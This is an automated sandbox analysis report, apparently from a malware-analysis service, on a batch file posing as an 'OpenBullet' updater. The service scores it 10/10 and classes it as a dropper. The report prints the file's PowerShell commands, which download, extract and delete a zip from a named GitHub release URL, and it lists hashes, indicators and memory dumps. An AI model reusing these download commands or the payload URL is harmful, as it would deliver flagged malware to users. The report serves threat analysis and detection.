8e903c28cdbed795408dcec8e83c833aaaa00089b89c9a69fbc65cf4e8ed4d92

Analysis

max time kernel
120s
max time network
125s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
27/02/2024, 21:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

OpenBullet-Anomaly-main/AnomalyUpdater.bat
Size

1KB
MD5

41a80a691d9f594e851c23ed0b480aff
SHA1

16418323182ec7cff740134cf65857dcfb023eb1
SHA256

93275ad49c569fb8daef227bd5b2a8fd450e69a02702b0d2efa3f1d1d6e4f4b5
SHA512

41b8db5a4ba8c93c9b164161b681f4329c6344a0644cf136c87c4493e094ba6d35141e5510ad76d5336b9cd006c8414a0fb75f94bab050acec08591697f5dad9

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/OpenBulletAnomaly/OpenBullet-Anomaly/releases/download/1.4.5/OpenBullet-v1.4.5.zip

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	2912	powershell.exe
4	2912	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2912	powershell.exe
2520	powershell.exe
2748	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2912	powershell.exe
Token: SeDebugPrivilege	2520	powershell.exe
Token: SeDebugPrivilege	2748	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2656 wrote to memory of 2912	2656	cmd.exe	29
PID 2656 wrote to memory of 2912	2656	cmd.exe	29
PID 2656 wrote to memory of 2912	2656	cmd.exe	29
PID 2656 wrote to memory of 2520	2656	cmd.exe	30
PID 2656 wrote to memory of 2520	2656	cmd.exe	30
PID 2656 wrote to memory of 2520	2656	cmd.exe	30
PID 2656 wrote to memory of 2748	2656	cmd.exe	31
PID 2656 wrote to memory of 2748	2656	cmd.exe	31
PID 2656 wrote to memory of 2748	2656	cmd.exe	31

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\OpenBullet-Anomaly-main\AnomalyUpdater.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2656
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell (New-Object System.Net.WebClient).Downloadfile('https://github.com/OpenBulletAnomaly/OpenBullet-Anomaly/releases/download/1.4.5/OpenBullet-v1.4.5.zip', 'OpenBullet-v1.4.5.zip')
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2912
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe Expand-Archive -Path OpenBullet-v1.4.5.zip -DestinationPath OpenBullet-1.4.5 -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2520
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Remove-Item -Path OpenBullet-v1.4.5.zip -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2748

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
0bfe7e6fde2ac9e796a6f9b43879524d

SHA1
1a08a3571fe98ef11884289bbb5a9731134a5023

SHA256
2e950e77a1a3436d7d415d2bf590d13b56f6686a8990484b17f3b75b4e5310fa

SHA512
d9eca412d321a370885834ee2d930d6f28f47b8282e8cfcc945e67c84d3545e1549e16115a9d781bb0fa925012ee6c038baed856cbe95c462795d938f07d1739

Download Submit
memory/2520-19-0x00000000024E0000-0x00000000024E8000-memory.dmp

Filesize
32KB

Download
memory/2520-25-0x000007FEF4EC0000-0x000007FEF585D000-memory.dmp

Filesize
9.6MB

Download
memory/2520-24-0x0000000002940000-0x00000000029C0000-memory.dmp

Filesize
512KB

Download
memory/2520-23-0x0000000002940000-0x00000000029C0000-memory.dmp

Filesize
512KB

Download
memory/2520-22-0x0000000002940000-0x00000000029C0000-memory.dmp

Filesize
512KB

Download
memory/2520-21-0x000007FEF4EC0000-0x000007FEF585D000-memory.dmp

Filesize
9.6MB

Download
memory/2520-18-0x000007FEF4EC0000-0x000007FEF585D000-memory.dmp

Filesize
9.6MB

Download
memory/2520-20-0x0000000002940000-0x00000000029C0000-memory.dmp

Filesize
512KB

Download
memory/2520-17-0x000000001B220000-0x000000001B502000-memory.dmp

Filesize
2.9MB

Download
memory/2748-31-0x000007FEF5860000-0x000007FEF61FD000-memory.dmp

Filesize
9.6MB

Download
memory/2748-32-0x00000000024E0000-0x0000000002560000-memory.dmp

Filesize
512KB

Download
memory/2748-37-0x000007FEF5860000-0x000007FEF61FD000-memory.dmp

Filesize
9.6MB

Download
memory/2748-36-0x00000000024E0000-0x0000000002560000-memory.dmp

Filesize
512KB

Download
memory/2748-35-0x00000000024E0000-0x0000000002560000-memory.dmp

Filesize
512KB

Download
memory/2748-34-0x00000000024E0000-0x0000000002560000-memory.dmp

Filesize
512KB

Download
memory/2748-33-0x000007FEF5860000-0x000007FEF61FD000-memory.dmp

Filesize
9.6MB

Download
memory/2912-8-0x0000000002A30000-0x0000000002AB0000-memory.dmp

Filesize
512KB

Download
memory/2912-4-0x000007FEF5860000-0x000007FEF61FD000-memory.dmp

Filesize
9.6MB

Download
memory/2912-5-0x0000000002A30000-0x0000000002AB0000-memory.dmp

Filesize
512KB

Download
memory/2912-6-0x000000001B2E0000-0x000000001B5C2000-memory.dmp

Filesize
2.9MB

Download
memory/2912-7-0x0000000001DD0000-0x0000000001DD8000-memory.dmp

Filesize
32KB

Download
memory/2912-10-0x000007FEF5860000-0x000007FEF61FD000-memory.dmp

Filesize
9.6MB

Download
memory/2912-9-0x0000000002A30000-0x0000000002AB0000-memory.dmp

Filesize
512KB

Download
memory/2912-11-0x0000000002A30000-0x0000000002AB0000-memory.dmp

Filesize
512KB

Download